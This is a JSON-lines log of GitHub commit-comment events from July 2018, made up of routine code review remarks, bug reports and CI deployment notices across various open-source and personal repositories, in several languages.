{"id":"7920059770","type":"CommitCommentEvent","actor":{"login":"Amid198"},"repo":{"name":"python/cpython"},"payload":{"comment":{"id":29599421,"position":null,"line":null,"path":null,"commit_id":"5c01d99c12876263d8cc700a11cce9ad88994096","created_at":"2018-07-04T20:51:03Z","updated_at":"2018-07-04T20:51:03Z","author_association":"NONE","body":"5c01d99\r\n[Печать (1).pdf](https://github.com/python/cpython/files/2164295/1.pdf)\r\n\r\n"}},"created_at":"2018-07-04T20:51:03Z"}
{"id":"7920061203","type":"CommitCommentEvent","actor":{"login":"maximbaz"},"repo":{"name":"kovidgoyal/kitty"},"payload":{"comment":{"id":29599424,"position":null,"line":null,"path":null,"commit_id":"2b0d8bfe461ff8430cc86ee8d51ddc14adf95e23","created_at":"2018-07-04T20:51:37Z","updated_at":"2018-07-04T20:51:37Z","author_association":"CONTRIBUTOR","body":"There are now https://sw.kovidgoyal.net/kitty/conf.html and https://sw.kovidgoyal.net/kitty/_downloads/kitty.conf"}},"created_at":"2018-07-04T20:51:37Z"}
{"id":"7920061324","type":"CommitCommentEvent","actor":{"login":"159955062a"},"repo":{"name":"bitcoin/bips"},"payload":{"comment":{"id":29599425,"position":26,"line":294,"path":"bip-0158.mediawiki","commit_id":"6cc0c85a10b013107f45e01c5580a924f97f6e5b","created_at":"2018-07-04T20:51:40Z","updated_at":"2018-07-04T20:51:40Z","author_association":"NONE","body":"OP_RETURN"}},"created_at":"2018-07-04T20:51:40Z"}
{"id":"7920061743","type":"CommitCommentEvent","actor":{"login":"agatakrawczyk"},"repo":{"name":"fairlanguage/Fairlanguage-autocorrect-Server"},"payload":{"comment":{"id":29599426,"position":null,"line":null,"path":null,"commit_id":"bcf3a2b3793d0b5a3ad20101c5b538e5b660d96b","created_at":"2018-07-04T20:51:50Z","updated_at":"2018-07-04T20:51:50Z","author_association":"COLLABORATOR","body":"The important part here is that we are using the Style “unfair” for errors with type Bias Language now"}},"created_at":"2018-07-04T20:51:50Z"}
{"id":"7920062291","type":"CommitCommentEvent","actor":{"login":"discoursebot"},"repo":{"name":"discourse/discourse"},"payload":{"comment":{"id":29599427,"position":null,"line":null,"path":null,"commit_id":"272646c1df1750f5897b67abdd8e86c8e9b303bb","created_at":"2018-07-04T20:52:04Z","updated_at":"2018-07-04T20:52:04Z","author_association":"NONE","body":"This commit has been mentioned on **Discourse Meta**. There might be relevant details there:\n\nhttps://meta.discourse.org/t/consider-replying-to-multiple-posts-counts-lock-unlist-actions/91411/3\n"}},"created_at":"2018-07-04T20:52:04Z"}
{"id":"7920063489","type":"CommitCommentEvent","actor":{"login":"Amid198"},"repo":{"name":"python/cpython"},"payload":{"comment":{"id":29599430,"position":null,"line":null,"path":null,"commit_id":"5c01d99c12876263d8cc700a11cce9ad88994096","created_at":"2018-07-04T20:52:32Z","updated_at":"2018-07-04T20:52:32Z","author_association":"NONE","body":"Amid 198\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-04T20:52:32Z"}
{"id":"7920063987","type":"CommitCommentEvent","actor":{"login":"kovidgoyal"},"repo":{"name":"kovidgoyal/kitty"},"payload":{"comment":{"id":29599431,"position":null,"line":null,"path":null,"commit_id":"2b0d8bfe461ff8430cc86ee8d51ddc14adf95e23","created_at":"2018-07-04T20:52:45Z","updated_at":"2018-07-04T20:52:45Z","author_association":"OWNER","body":"Not to mention that you can press `ctrl+shift+f2` to edit kitty.conf from inside kitty which will open with the default config file when no existing kitty.conf is found."}},"created_at":"2018-07-04T20:52:45Z"}
{"id":"7920064237","type":"CommitCommentEvent","actor":{"login":"fischermatte"},"repo":{"name":"fischermatte/geolud"},"payload":{"comment":{"id":29599432,"position":null,"line":null,"path":null,"commit_id":"4dd0a43b1db7f093bcc4e245042c85f68b8846c9","created_at":"2018-07-04T20:52:50Z","updated_at":"2018-07-04T20:52:50Z","author_association":"OWNER","body":"IBM Cloud [toolchain](https://console.ng.bluemix.net/devops/toolchains/e616026c-4362-460e-a0fc-b26f0f2f2031?env_id=ibm%3Ayp%3Aus-south \"geolud-toolchain\"): [Delivery Pipeline](https://console.ng.bluemix.net/devops/pipelines/95ed9bd9-62a1-4519-83ff-716671136007?env_id=ibm%3Ayp%3Aus-south \"geolud\") deployed [geolud](https://github.com/fischermatte/geolud/releases/tag/deploy-ibm-yp-us-south-fischermatte-staging-20180704-205250 \"deploy-ibm-yp-us-south-fischermatte-staging-20180704-205250\") to [staging](https://console.bluemix.net/apps/8ea4e46e-9db8-4c70-8f71-37c4a617032d?env_id=ibm:yp:us-south \"ibm:yp:us-south:fischermatte:staging\"), including this commit"}},"created_at":"2018-07-04T20:52:50Z"}
{"id":"7920065754","type":"CommitCommentEvent","actor":{"login":"darxriggs"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29599436,"position":71,"line":604,"path":"src/test/java/org/jenkinsci/plugins/gitclient/GitAPITestCase.java","commit_id":"637ae514811e381ab1b0294164594cce5849a7e1","created_at":"2018-07-04T20:53:28Z","updated_at":"2018-07-04T20:53:28Z","author_association":"NONE","body":"Hi @MarkEWaite, this test fails with cli git 2.14.1 on my machine with the current master (0ef4d20d057714bc5da618793b1c0c1c7bc9258e) as follows:\r\n\r\n`[ERROR] CliGitAPIImplTest.runTest:50->GitAPITestCase.test_fetch_needs_preceding_prune:1253 CliGit should have thrown an exception\r\n`\r\n\r\nWhich cli git version is running on https://ci.jenkins.io/job/Plugins/job/git-client-plugin/job/master/ or how can I find out?"}},"created_at":"2018-07-04T20:53:28Z"}
{"id":"7920066240","type":"CommitCommentEvent","actor":{"login":"jsolson"},"repo":{"name":"CobaltWolf/Bluedog-Design-Bureau"},"payload":{"comment":{"id":29599437,"position":null,"line":null,"path":null,"commit_id":"436d668425848c7c8087fe7b3e622fa673e599ea","created_at":"2018-07-04T20:53:41Z","updated_at":"2018-07-04T20:53:41Z","author_association":"COLLABORATOR","body":"I think it's perfect. It's even looks different depending on the angle like the real one.\r\n\r\nLooks like both tanks are about a meter longer. We could add fuel but lets leave it for the moment. It's a free buff if needed.\r\n\r\nThe engine is confusing at first. Defaulting to Bare leaves half the shroud buried in the tank when you switch. My first impression was the scale was screwed up. It took me a minute to figure out to remove it and reattach. Maybe go 2.5->1.875->Bare so you can attach, switch and see what you're getting."}},"created_at":"2018-07-04T20:53:41Z"}
{"id":"7920070377","type":"CommitCommentEvent","actor":{"login":"SevostyanovGerman"},"repo":{"name":"WebEducationPlatform/CRM"},"payload":{"comment":{"id":29599441,"position":16,"line":121,"path":"src/main/java/com/ewp/crm/controllers/rest/StatusRestController.java","commit_id":"15612ffeb52df8e5c8abab1e6d2114222948b3d4","created_at":"2018-07-04T20:55:28Z","updated_at":"2018-07-04T20:55:28Z","author_association":"NONE","body":"а ты уверен что нужно апдейтить? ведь если мы вытащили сущность из бд то хибер нам сам её обновит"}},"created_at":"2018-07-04T20:55:28Z"}
{"id":"7920070781","type":"CommitCommentEvent","actor":{"login":"dead10ck"},"repo":{"name":"kovidgoyal/kitty"},"payload":{"comment":{"id":29599442,"position":null,"line":null,"path":null,"commit_id":"2b0d8bfe461ff8430cc86ee8d51ddc14adf95e23","created_at":"2018-07-04T20:55:38Z","updated_at":"2018-07-04T20:55:38Z","author_association":"NONE","body":"Ah, thank you! I missed that in the new config docs, since it was all the way at the bottom."}},"created_at":"2018-07-04T20:55:38Z"}
{"id":"7920070797","type":"CommitCommentEvent","actor":{"login":"ohm314"},"repo":{"name":"rhizome-asso/UDP-server"},"payload":{"comment":{"id":29599443,"position":7,"line":17,"path":"udp_server.py","commit_id":"bdfdc2564239ac0e7c9300293494f2b37075bcb4","created_at":"2018-07-04T20:55:38Z","updated_at":"2018-07-04T20:55:38Z","author_association":"CONTRIBUTOR","body":"Here I would start with only decoding the 4s and taking them off the buffer. based on what is the string you will then call a decoder function based on the message type:\r\n\r\n```\r\nmsgtype_fmt = '4s'\r\nmsgtype = decode(fmt, raw_data[:4])\r\nif msgtype == 'DATA':\r\n    sensor, device = decode_data(raw_data[4:])\r\nelse:\r\n    print('%s message type unknown\"%msgtype)\r\n```\r\n"}},"created_at":"2018-07-04T20:55:38Z"}
{"id":"7920071100","type":"CommitCommentEvent","actor":{"login":"Rexagon"},"repo":{"name":"ITLabRTUMIREA/ITLab-Front"},"payload":{"comment":{"id":29599444,"position":null,"line":null,"path":null,"commit_id":"8faa37462976a95d4cabaa8794e97cb4271a4de1","created_at":"2018-07-04T20:55:47Z","updated_at":"2018-07-04T20:55:47Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Просмотр и изменение владельца оборудования](https://trello.com/c/lF5U4Wl4/52-%D0%BF%D1%80%D0%BE%D1%81%D0%BC%D0%BE%D1%82%D1%80-%D0%B8-%D0%B8%D0%B7%D0%BC%D0%B5%D0%BD%D0%B5%D0%BD%D0%B8%D0%B5-%D0%B2%D0%BB%D0%B0%D0%B4%D0%B5%D0%BB%D1%8C%D1%86%D0%B0-%D0%BE%D0%B1%D0%BE%D1%80%D1%83%D0%B4%D0%BE%D0%B2%D0%B0%D0%BD%D0%B8%D1%8F)"}},"created_at":"2018-07-04T20:55:47Z"}
{"id":"7920071677","type":"CommitCommentEvent","actor":{"login":"gvanem"},"repo":{"name":"torproject/tor"},"payload":{"comment":{"id":29599445,"position":null,"line":null,"path":null,"commit_id":"c8ccd028a78d154c3b82138f7827aec0e2de13dd","created_at":"2018-07-04T20:56:00Z","updated_at":"2018-07-04T20:56:00Z","author_association":"CONTRIBUTOR","body":"No, no:\r\n```c\r\nstatic inline int strncasecmp(const char *a, const char *b, size_t n) {\r\n  return strnicmp(a,b,n);\r\n}\r\n...\r\nstatic inline int strcasecmp(const char *a, const char *b) {\r\n  return stricmp(a,b);\r\n}\r\n```"}},"created_at":"2018-07-04T20:56:00Z"}
{"id":"7920075391","type":"CommitCommentEvent","actor":{"login":"nickbrazeau"},"repo":{"name":"jonbparr/IDEEL_Pipelines"},"payload":{"comment":{"id":29599450,"position":null,"line":null,"path":null,"commit_id":"c43bc08c9e08bfd11117ed9246314748be6f0825","created_at":"2018-07-04T20:57:22Z","updated_at":"2018-07-04T20:57:22Z","author_association":"NONE","body":"thank you JP, I am merging these fixes to the absolute paths for LL "}},"created_at":"2018-07-04T20:57:22Z"}
{"id":"7920076534","type":"CommitCommentEvent","actor":{"login":"MReis89"},"repo":{"name":"DenysXavier/WSBoletoSantander"},"payload":{"comment":{"id":29599452,"position":null,"line":null,"path":null,"commit_id":"fa778bce59cc348eea8354135181599fdbe81e05","created_at":"2018-07-04T20:57:51Z","updated_at":"2018-07-04T20:57:51Z","author_association":"NONE","body":"@DenysXavier \r\n\r\nEstou utilizando sua biblioteca e gostaria de parabeniza-lo.\r\n\r\nTentei fazer uma solicitação de teste para o Santander e retornou Formato do campo TITULO.VL inválido; Formato do campo TITULO.VL inválido\r\n\r\nPercebi que nesse commit foi feita a formatação nos índices TITULO.VL-PERC-MINIMO e TITULO.VL-PERC-MAXIMO, porém com o padrão BR. \r\n\r\nTroquei o separadorDecimal para '.' e o boleto foi registrado.\r\n\r\n"}},"created_at":"2018-07-04T20:57:51Z"}
{"id":"7920077185","type":"CommitCommentEvent","actor":{"login":"gibaBR"},"repo":{"name":"gibaBR/XCI-Organizer"},"payload":{"comment":{"id":29599453,"position":null,"line":null,"path":null,"commit_id":"109bed26c6e81037a89798d392788fcd8b2b2dd7","created_at":"2018-07-04T20:58:08Z","updated_at":"2018-07-04T20:58:08Z","author_association":"OWNER","body":"It works as expected."}},"created_at":"2018-07-04T20:58:08Z"}
{"id":"7920078050","type":"CommitCommentEvent","actor":{"login":"michaelgira23"},"repo":{"name":"steveand117/RealJungleHelper"},"payload":{"comment":{"id":29599455,"position":null,"line":null,"path":null,"commit_id":"42d6c6330542f961ddd7c30f35d0b014d789f0cb","created_at":"2018-07-04T20:58:31Z","updated_at":"2018-07-04T20:58:31Z","author_association":"NONE","body":"nice"}},"created_at":"2018-07-04T20:58:31Z"}
{"id":"7920079039","type":"CommitCommentEvent","actor":{"login":"bonzini"},"repo":{"name":"esposem/qemu"},"payload":{"comment":{"id":29599463,"position":78,"line":78,"path":"tests/qgraph/qsdhci.c","commit_id":"c1b0b974ae0cb10ac7af059799fb5fc9f019de53","created_at":"2018-07-04T20:58:56Z","updated_at":"2018-07-04T20:58:56Z","author_association":"NONE","body":"Yes, you're right. It can be useful to retrieve the pci-device parent and/or the bus, but that should not be done through get_driver. It is a separate QOSGraphObject along the path from machine to test."}},"created_at":"2018-07-04T20:58:56Z"}
{"id":"7920079571","type":"CommitCommentEvent","actor":{"login":"davidebaldassarre"},"repo":{"name":"strumet/strumet.github.io"},"payload":{"comment":{"id":29599464,"position":null,"line":null,"path":null,"commit_id":"9da149186b0322319a3e7655b90b8b40caeabe3d","created_at":"2018-07-04T20:59:09Z","updated_at":"2018-07-04T20:59:09Z","author_association":"CONTRIBUTOR","body":"Buonasera prof, \nHo ricontrollato gli ex di Illustrator ma non riscontro errori… cosa c’è che non va nell’ ex 5?\n\n> Il giorno 02 lug 2018, alle ore 15:59, strumet <notifications@github.com> ha scritto:\n> \n> Ciao Davide,\n> l'esercizio cad EX10, come tutti i precedenti, deve produrre un disegno vettoriale, non un'immagine raster.\n> \n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub <https://github.com/strumet/strumet.github.io/commit/9da149186b0322319a3e7655b90b8b40caeabe3d#commitcomment-29567083>, or mute the thread <https://github.com/notifications/unsubscribe-auth/AjY4zfB_Stgr2eJB8GcDzfTSdc2_hdkFks5uCic1gaJpZM4U_Xpb>.\n> \n\n"}},"created_at":"2018-07-04T20:59:09Z"}
{"id":"7920080102","type":"CommitCommentEvent","actor":{"login":"killerwife"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":29599467,"position":null,"line":null,"path":null,"commit_id":"ac29bd0c72b292c10e988a026df3ba2d3aaeda33","created_at":"2018-07-04T20:59:24Z","updated_at":"2018-07-04T20:59:24Z","author_association":"CONTRIBUTOR","body":"                                                                                      There is simply mismatch between qsw and core, its nothing uncommon. I dont know if its wrong, but I know that in tbc cot and mind numbing use diff aura id."}},"created_at":"2018-07-04T20:59:24Z"}
{"id":"7920081566","type":"CommitCommentEvent","actor":{"login":"OdedRadi"},"repo":{"name":"OdedRadi/CheckersGame-CSharp"},"payload":{"comment":{"id":29599475,"position":4,"line":7,"path":"CheckersGame/Symbols.cs","commit_id":"1c69c3ac48621e85157936f8d12952c175033af2","created_at":"2018-07-04T21:00:03Z","updated_at":"2018-07-04T21:00:03Z","author_association":"OWNER","body":"dsda"}},"created_at":"2018-07-04T21:00:03Z"}
{"id":"7920081825","type":"CommitCommentEvent","actor":{"login":"Mianovag"},"repo":{"name":"stefangabos/Zebra_Pagination"},"payload":{"comment":{"id":29599477,"position":null,"line":null,"path":null,"commit_id":"40af1e42782184cfe27c4fbbf9965388aa578a11","created_at":"2018-07-04T21:00:10Z","updated_at":"2018-07-04T21:00:10Z","author_association":"NONE","body":"have made an update to the new version and i got the following error\r\n\r\nNotice: Undefined variable: active in C:\\xampp\\htdocs\\.....\\Zebra_Pagination.php on line 909\r\n\r\ni have fix this error adding \r\n$active = \"\";\r\nand it is working\r\nbut not sure if i did right\r\n\r\nany comment regardin' this issue?"}},"created_at":"2018-07-04T21:00:10Z"}
{"id":"7920082414","type":"CommitCommentEvent","actor":{"login":"OdedRadi"},"repo":{"name":"OdedRadi/CheckersGame-CSharp"},"payload":{"comment":{"id":29599483,"position":4,"line":7,"path":"CheckersGame/Symbols.cs","commit_id":"1c69c3ac48621e85157936f8d12952c175033af2","created_at":"2018-07-04T21:00:21Z","updated_at":"2018-07-04T21:00:21Z","author_association":"OWNER","body":"erfew"}},"created_at":"2018-07-04T21:00:21Z"}
{"id":"7920083069","type":"CommitCommentEvent","actor":{"login":"origindesign"},"repo":{"name":"origindesign/skitaos"},"payload":{"comment":{"id":29599487,"position":null,"line":null,"path":null,"commit_id":"bb34a1f32f4056869d212092d1ad7299dbb0efcb","created_at":"2018-07-04T21:00:37Z","updated_at":"2018-07-04T21:00:37Z","author_association":"OWNER","body":"Created multidev environment [ski-taos#ci-16](https://dashboard.pantheon.io/sites/22e63f3f-bdff-4894-a158-a29f219020d1#ci-16).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-16-ski-taos.pantheonsite.io/)"}},"created_at":"2018-07-04T21:00:37Z"}
{"id":"7920090123","type":"CommitCommentEvent","actor":{"login":"brynjare"},"repo":{"name":"PoC-Consortium/Utilities"},"payload":{"comment":{"id":29599493,"position":null,"line":null,"path":null,"commit_id":"340617f1490522220a0f4f97dfad453ba64e0d6d","created_at":"2018-07-04T21:03:22Z","updated_at":"2018-07-04T21:03:22Z","author_association":"NONE","body":"The title no longer matches the actual description. PoC1 to PoC2 **would** be the intended mode of operation, based on the name of the script."}},"created_at":"2018-07-04T21:03:22Z"}
{"id":"7920090542","type":"CommitCommentEvent","actor":{"login":"stefangabos"},"repo":{"name":"stefangabos/Zebra_Pagination"},"payload":{"comment":{"id":29599494,"position":null,"line":null,"path":null,"commit_id":"40af1e42782184cfe27c4fbbf9965388aa578a11","created_at":"2018-07-04T21:03:33Z","updated_at":"2018-07-04T21:03:33Z","author_association":"OWNER","body":"fixed. thanks!"}},"created_at":"2018-07-04T21:03:33Z"}
{"id":"7920091573","type":"CommitCommentEvent","actor":{"login":"gayathri-amirineni"},"repo":{"name":"gayathri-amirineni/puzzles"},"payload":{"comment":{"id":29599495,"position":null,"line":null,"path":null,"commit_id":"71913311b8a4213ad7ff065a3af36f10f21be5fe","created_at":"2018-07-04T21:04:01Z","updated_at":"2018-07-04T21:04:01Z","author_association":"OWNER","body":"\r\n\r\n[Puzzles.zip](https://github.com/gayathri-amirineni/puzzles/files/2164323/Puzzles.zip)\r\n"}},"created_at":"2018-07-04T21:04:01Z"}
{"id":"7920091608","type":"CommitCommentEvent","actor":{"login":"LemTheLemon"},"repo":{"name":"Cerium3/Modpack"},"payload":{"comment":{"id":29599496,"position":null,"line":null,"path":null,"commit_id":"02b89aca9e9409bb76bc33c2c001f797b8248da5","created_at":"2018-07-04T21:04:02Z","updated_at":"2018-07-04T21:04:02Z","author_association":"COLLABORATOR","body":"*claps*"}},"created_at":"2018-07-04T21:04:02Z"}
{"id":"7920095386","type":"CommitCommentEvent","actor":{"login":"gprxxx"},"repo":{"name":"gprxxx/swot"},"payload":{"comment":{"id":29599498,"position":null,"line":null,"path":null,"commit_id":"e4f546d964f12ecb8eb98a2c38a78ed6d3187dc5","created_at":"2018-07-04T21:05:46Z","updated_at":"2018-07-04T21:05:46Z","author_association":"OWNER","body":"https://www.umcs.pl/pl/program-microsoft-imagine-i-microsoft-live-edu-office-365,1715.htm"}},"created_at":"2018-07-04T21:05:46Z"}
{"id":"7920095660","type":"CommitCommentEvent","actor":{"login":"yknl"},"repo":{"name":"blockstack/blockstack-ios"},"payload":{"comment":{"id":29599499,"position":25,"line":101,"path":"Blockstack/Classes/Blockstack.swift","commit_id":"734ed8ff5546ed59ff2baebc7b854818665f04c6","created_at":"2018-07-04T21:05:54Z","updated_at":"2018-07-04T21:05:54Z","author_association":"COLLABORATOR","body":"The system alert is going to be confusing to users, but `SFSafariViewController and `SFAuthenticationSession` doesn't share cookies so you won't be able to use it. \r\n\r\nIn iOS 12, Apple is deprecating `SFAuthenticationSession` in favour of `ASWebAuthenticationSession` which is essentially the same thing but it shares cookies with the native Safari app. This means that we may be able to app switch to the native Safari app for sign out and mitigate the system prompt.\r\n\r\nASWebAuthenticationSession:\r\nhttps://developer.apple.com/documentation/authenticationservices/aswebauthenticationsession\r\n\r\nWe can take the user to `/clear-auth?redirect_uri=myblockstackapp` and have the Blockstack browser redirect to `myblockstackapp://`. Alternatively, we can redirect to the app's `redirect.html` page, in which case we need to modify `redirect.html` to handle logout redirects. I'm leaning towards the former since it doesn't require app developers to make changes to their web app, but if we run into problems we can try the `redirect.html` method."}},"created_at":"2018-07-04T21:05:54Z"}
{"id":"7920101212","type":"CommitCommentEvent","actor":{"login":"yknl"},"repo":{"name":"blockstack/blockstack-ios"},"payload":{"comment":{"id":29599505,"position":31,"line":72,"path":"Example/Blockstack/ViewController.swift","commit_id":"734ed8ff5546ed59ff2baebc7b854818665f04c6","created_at":"2018-07-04T21:08:27Z","updated_at":"2018-07-04T21:08:27Z","author_association":"COLLABORATOR","body":"This would depend on which route we choose as I mentioned in the previous comment."}},"created_at":"2018-07-04T21:08:27Z"}
{"id":"7920101527","type":"CommitCommentEvent","actor":{"login":"153957"},"repo":{"name":"HiSPARC/publicdb"},"payload":{"comment":{"id":29599506,"position":null,"line":null,"path":null,"commit_id":"06d3e611ae774720ae7b65dfd58336fbfc9ca180","created_at":"2018-07-04T21:08:36Z","updated_at":"2018-07-04T21:08:36Z","author_association":"MEMBER","body":"You left the closing tags enabled `</a>`, but that is not a big problem, stuff still works."}},"created_at":"2018-07-04T21:08:36Z"}
{"id":"7920102849","type":"CommitCommentEvent","actor":{"login":"ronawho"},"repo":{"name":"chapel-lang/chapel"},"payload":{"comment":{"id":29599509,"position":8,"line":791,"path":"util/start_test","commit_id":"71b07766eba924122717eb2f6335e7a33cf8fa40","created_at":"2018-07-04T21:09:10Z","updated_at":"2018-07-04T21:09:10Z","author_association":"CONTRIBUTOR","body":"Yeah, paratest stuffs the printchplenv output into the environment on the remote side, but does not propagate things like `CHPL_RE2_VALGRIND_SUPPORT` over\r\n\r\nBut yeah, I agree this is wrong, especially for `CHPL_REGEXP=none`. https://github.com/chapel-lang/chapel/compare/master...ronawho:fix-start_test-valgrind should fix, I'll test/merge tomorrow "}},"created_at":"2018-07-04T21:09:10Z"}
{"id":"7920105356","type":"CommitCommentEvent","actor":{"login":"mohamedmansour"},"repo":{"name":"mohamedmansour/prayer-times-extension"},"payload":{"comment":{"id":29599513,"position":null,"line":null,"path":null,"commit_id":"cbd0cbe68dfdbe092ba039a54bbcdb41308f64d8","created_at":"2018-07-04T21:10:18Z","updated_at":"2018-07-04T21:10:18Z","author_association":"OWNER","body":"#22 "}},"created_at":"2018-07-04T21:10:18Z"}
{"id":"7920106619","type":"CommitCommentEvent","actor":{"login":"fribmendes"},"repo":{"name":"luisptorres/alarms"},"payload":{"comment":{"id":29599516,"position":4,"line":8,"path":"src/components/Button/index.css","commit_id":"8801f63c15dc83b3041a87f14e000b48e2afed3a","created_at":"2018-07-04T21:10:52Z","updated_at":"2018-07-04T21:10:52Z","author_association":"NONE","body":"Unnecessary newline"}},"created_at":"2018-07-04T21:10:52Z"}
{"id":"7920109766","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"Arcadiusz/Arkadiusz-Urbanski-Kodilla-java"},"payload":{"comment":{"id":29599524,"position":5,"line":5,"path":"kodilla-patterns/src/main/java/com/kodilla/patterns/factory/tasks/DrivingTask.java","commit_id":"8072fde5b15bb473abba4e827ea32e0f74d1c7a1","created_at":"2018-07-04T21:12:17Z","updated_at":"2018-07-04T21:12:17Z","author_association":"NONE","body":"Zmienne powinny być prywatne"}},"created_at":"2018-07-04T21:12:17Z"}
{"id":"7920110192","type":"CommitCommentEvent","actor":{"login":"gabbacode"},"repo":{"name":"gabbacode/Kanban.Desktop"},"payload":{"comment":{"id":29599525,"position":13,"line":12,"path":"Kanban.Desktop/Kanban.Desktop.LocalBase/BaseSelector/Model/BaseSelectorModel.cs","commit_id":"18802b940c8f6f52bd280068ee67a5695fd2661b","created_at":"2018-07-04T21:12:29Z","updated_at":"2018-07-04T21:12:29Z","author_association":"OWNER","body":"диалог в модели не гуд"}},"created_at":"2018-07-04T21:12:29Z"}
{"id":"7920110700","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"Arcadiusz/Arkadiusz-Urbanski-Kodilla-java"},"payload":{"comment":{"id":29599527,"position":17,"line":17,"path":"kodilla-patterns/src/main/java/com/kodilla/patterns/factory/tasks/DrivingTask.java","commit_id":"8072fde5b15bb473abba4e827ea32e0f74d1c7a1","created_at":"2018-07-04T21:12:42Z","updated_at":"2018-07-04T21:12:42Z","author_association":"NONE","body":"Metoda executeTask powinna zmieniać wartość boolean (np executed) na true"}},"created_at":"2018-07-04T21:12:42Z"}
{"id":"7920111540","type":"CommitCommentEvent","actor":{"login":"375gnu"},"repo":{"name":"CelestiaProject/Celestia"},"payload":{"comment":{"id":29599529,"position":null,"line":null,"path":null,"commit_id":"eaaf6d4634a3719b1f34f497504e43de009e7a78","created_at":"2018-07-04T21:13:05Z","updated_at":"2018-07-04T21:13:05Z","author_association":"CONTRIBUTOR","body":"This check is a valid one, the main question is \"whether this is the only place to check `costate`'s value?\" If only here, then your code is quite Ok, but if there is any other place, then you should add more checks and maybe moving it getAppCore() is a good idea. But it seems to me that you should change `true` to `false`.\r\n\r\nIf you want to create a new PR then: 1) create a new branch on top of main, 2) add your commits (you can cherry pick them from other branch) 3) push the new branch"}},"created_at":"2018-07-04T21:13:05Z"}
{"id":"7920111690","type":"CommitCommentEvent","actor":{"login":"pplutap"},"repo":{"name":"Arcadiusz/Arkadiusz-Urbanski-Kodilla-java"},"payload":{"comment":{"id":29599530,"position":27,"line":27,"path":"kodilla-patterns/src/main/java/com/kodilla/patterns/factory/tasks/DrivingTask.java","commit_id":"8072fde5b15bb473abba4e827ea32e0f74d1c7a1","created_at":"2018-07-04T21:13:08Z","updated_at":"2018-07-04T21:13:08Z","author_association":"NONE","body":"Metoda powinna zwracać wartość zmiennej boolean (np executed)"}},"created_at":"2018-07-04T21:13:08Z"}
{"id":"7920114451","type":"CommitCommentEvent","actor":{"login":"MarkEWaite"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29599534,"position":71,"line":604,"path":"src/test/java/org/jenkinsci/plugins/gitclient/GitAPITestCase.java","commit_id":"637ae514811e381ab1b0294164594cce5849a7e1","created_at":"2018-07-04T21:14:28Z","updated_at":"2018-07-04T21:14:28Z","author_association":"CONTRIBUTOR","body":"I'm not sure why the git version running on the CI job would matter, but since the ci.jenkins.io Linux versions are Ubuntu, I suspect it is command line git version 2.7.4, as available with Ubuntu 16.04.\r\n\r\nThe test also passes in my development environment with:\r\n\r\n| Operating System | Git Version |\r\n| ---------------- | ----------- |\r\n| CentOS 6         | 2.4.5       |\r\n| CentOS 7         | 1.8.3.1     |\r\n| Debian 8         | 2.1.4       |\r\n| Debian 9         | 2.11.0      |\r\n| Ubuntu 14        | 1.9.1       |\r\n| Ubuntu 16        | 2.7.4       |\r\n| Windows 10       | 2.16.0      |\r\n| Windows 10       | 2.17.0      |\r\n"}},"created_at":"2018-07-04T21:14:28Z"}
{"id":"7920115583","type":"CommitCommentEvent","actor":{"login":"gabbacode"},"repo":{"name":"gabbacode/Kanban.Desktop"},"payload":{"comment":{"id":29599537,"position":113,"line":99,"path":"Kanban.Desktop/Kanban.Desktop.LocalBase/BaseSelector/Model/BaseSelectorModel.cs","commit_id":"18802b940c8f6f52bd280068ee67a5695fd2661b","created_at":"2018-07-04T21:15:00Z","updated_at":"2018-07-04T21:15:00Z","author_association":"OWNER","body":"а листа все есть чтобы это сделать"}},"created_at":"2018-07-04T21:15:00Z"}
{"id":"7920116757","type":"CommitCommentEvent","actor":{"login":"maksbotan"},"repo":{"name":"serokell/ariadne"},"payload":{"comment":{"id":29599542,"position":32,"line":163,"path":"ui/vty/src/Ariadne/UI/Vty/App.hs","commit_id":"6d4278c6f894a4a639019de3468d2e15c27c07e7","created_at":"2018-07-04T21:15:33Z","updated_at":"2018-07-04T21:15:33Z","author_association":"CONTRIBUTOR","body":"`handleAppEvent ev <$ updateAppFocusRing` or something like that?"}},"created_at":"2018-07-04T21:15:33Z"}
{"id":"7920117013","type":"CommitCommentEvent","actor":{"login":"MarkEWaite"},"repo":{"name":"jenkinsci/git-client-plugin"},"payload":{"comment":{"id":29599543,"position":157,"line":850,"path":"src/test/java/org/jenkinsci/plugins/gitclient/GitAPITestCase.java","commit_id":"efdcd2ac24ff3c8036aae53bff2969822712ff39","created_at":"2018-07-04T21:15:40Z","updated_at":"2018-07-04T21:15:40Z","author_association":"CONTRIBUTOR","body":"\r\n\r\nSee comment in the other location.  Versions tested include:\r\n\r\n| Operating System | Git Version |\r\n| ---------------- | ----------- |\r\n| CentOS 6         | 2.4.5       |\r\n| CentOS 7         | 1.8.3.1     |\r\n| Debian 8         | 2.1.4       |\r\n| Debian 9         | 2.11.0      |\r\n| Ubuntu 14        | 1.9.1       |\r\n| Ubuntu 16        | 2.7.4       |\r\n| Windows 10       | 2.16.0      |\r\n| Windows 10       | 2.17.0      |\r\n"}},"created_at":"2018-07-04T21:15:40Z"}
{"id":"7920117126","type":"CommitCommentEvent","actor":{"login":"AllenChong"},"repo":{"name":"AllenChong/AppVeyor"},"payload":{"comment":{"id":29599544,"position":null,"line":null,"path":null,"commit_id":"94e1a611b65bf382c5d29a6e81c688bbf05f6d50","created_at":"2018-07-04T21:15:44Z","updated_at":"2018-07-04T21:15:44Z","author_association":"OWNER","body":"94e1a61"}},"created_at":"2018-07-04T21:15:44Z"}
